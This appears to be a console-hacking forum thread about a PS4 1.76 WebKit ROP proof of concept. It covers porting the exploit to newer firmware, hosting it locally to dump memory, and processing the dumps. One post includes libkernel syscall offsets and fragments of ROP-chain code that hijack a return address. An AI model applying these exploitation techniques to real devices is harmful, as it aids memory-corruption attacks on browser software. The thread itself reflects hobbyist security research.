PS4 1.76 Webkit ROP POC

[Berlin]

i really do want the new features coming with fw 2.0 but i will most likely purchase another PS4 to keep 1 vulnerable and 1 legit for my online gaming.

i was thinking that the Xbox one would be hacked 1st and then awhile later the PS4.....

glad i purchased a PS4 instead of an xb1 even tho i always had an xbox360 in my home which i have jtag'd and flashed the drive with LT3.0 for online

I am aware of two different ways we can implement this exploit post 2.0. As for the 2.0 update, we should be able to get this working as is with some minor changes. There is another trick i am aware of that will allow people to implement this on any firmware version, but it is possible that will be fixed eventually as well. No need to buy another console just yet.

Advertising

[yifanlu]

Since this has been rumored to be patched in 2.0, should I update or should I wait or get another ps4 and keep it on 1.76 for a couple months while devs work on an exploit? If there are more vulnerabilities in 2.0> is it worth updating to?

It's not a rumor it's a fact; it will be patched at 2.00. And I'd say it's a safe assumption it's going to be longer than just a couple months before anything big is found, so your call on what you want to do.

I bet you $100 i can get this running on 2.0... Id say its fairly safe to update to be honest. Make of that what you will and update at your own risk, im %99 sure we will be able to port this to 2.0 one way or another.

Are you going to say webkit based apps?

Advertising

[Takezo]

Congratulation and thanks to Proxima and Nas_plugi.
I can confirm it works !!! I am also totally astonished by your "make_rop.py"

[Berlin]

[/quote]Are you going to say webkit based apps?[/quote]

That's not what i have in mind, although its a good guess i suppose.
I dont know if you can get this working on webkit based media apps (Netflix, ect) as i haven't really looked into that to much. I don't believe you can for a couple different reasons.

Using this webkit exploit on higher firmware will be slightly more difficult as you will have to employ several different methods to get you access to a vulnerable webkit revision.Without revealing specifics, there are a couple clever ways you can find to get this working sans the regular browser With that being said, id bet the farm that we get this to work on 2.0.

[varinek]

Hello,

pls can you help me how edit source code to working at my own server... dump upload not working for me. thanks in advance

[nas]

Try xampp if you're having problems

[varinek]

ty for reply... problem is that i have not ps4 ... but many users of my forum have ps4 system. so i upload files at http://ps3haxcz.com/ps4/. webkit proceed correctly but upload on server failed

[Takezo]

@varinek

dump-0x48f8c000-0
dump-0x48f8c000-1
dump-0x82f7e4000-0
dump-0x82f7e4000-1
dump-0x82f7e4000-2
dump-0x82f7e4000-3

Place this files into last_dump directory and exec python dir2bin.py

Because dumps are personal, you should say to your members
1-Install uWAmp http://www.uwamp.com
2-Copy nas poc into www
3-ps4 browser local ip let's go
...

@Nas I found some useful syscall in libkernel
sys_exit = 0xDD50 # + libkernel_base
munmap = 0xC0B0# + libkernel_base
execve = 0xBFF0 # + libkernel_base

But for example when i am trying to call sys_exit , i got memory error

Code: Select all

make_rop.py code:
sys_exit = 0xDD50 # + libkernel_base
func_1("libkernel_base",sys_exit,  0)
print_rop()
sp_takeover()# ?

Code: Select all

javascript rop code:
setU64to(chain_addr + 0, wk_base + 1277117);
setU64to(chain_addr + 8, 0);
setU64to(chain_addr + 16, libkernel_base + 56656);
// point a return address of the stack to our chain
setU64to(stack_base + return_va + 8, chain_addr);
setU64to(stack_base + return_va, wk_base + 392117);

[varinek]

thank you. I'll try it

[Karl69]

hi all,

i used Varinek's links and downloaded the dumps from there.
The dumps had to be processed, as leading zeroes were missing and the order of the bytes had to be swapped.
I'd like to share the resulting binaries with you guys.

cheers

karl